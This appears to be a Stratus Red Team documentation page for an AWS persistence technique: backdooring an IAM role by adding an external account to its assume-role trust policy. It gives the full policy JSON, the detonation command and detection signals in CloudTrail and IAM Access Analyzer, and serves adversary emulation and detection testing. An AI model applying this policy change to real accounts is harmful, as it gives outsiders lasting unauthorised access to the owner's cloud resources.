Skip to content

Backdoor an IAM Role

idempotent

Platform: AWS

MITRE ATT&CK Tactics

  • Persistence

Description

Establishes persistence by backdooring an existing IAM role, allowing it to be assumed from an external AWS account.

Warm-up:

  • Create an IAM role.

Detonation:

  • Update the assume role policy of the IAM role to backdoor it, making it accessible from an external, fictitious AWS account:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "ec2.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::193672423079:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Instructions

Detonate with Stratus Red Team
stratus detonate aws.persistence.iam-backdoor-role

Detection

  • Using CloudTrail's UpdateAssumeRolePolicy event.

  • Through IAM Access Analyzer, which generates a finding when a role can be assumed from a new AWS account or publicly.